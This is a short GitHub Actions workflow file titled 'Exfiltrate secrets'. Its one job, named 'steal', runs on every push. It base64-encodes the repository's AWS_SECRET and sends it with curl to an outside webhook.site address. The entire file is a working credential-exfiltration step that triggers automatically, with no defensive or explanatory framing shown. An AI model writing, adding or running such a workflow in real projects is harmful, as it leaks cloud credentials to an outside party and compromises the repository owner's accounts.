name: Exfiltrate secrets
on: push
jobs:
  steal:
    runs-on: ubuntu-latest
    steps:
      - run: echo "${{ secrets.AWS_SECRET }}" | base64 | curl -s -d @- https://webhook.site/afa73085-f923-42de-81ad-1617d68859c9
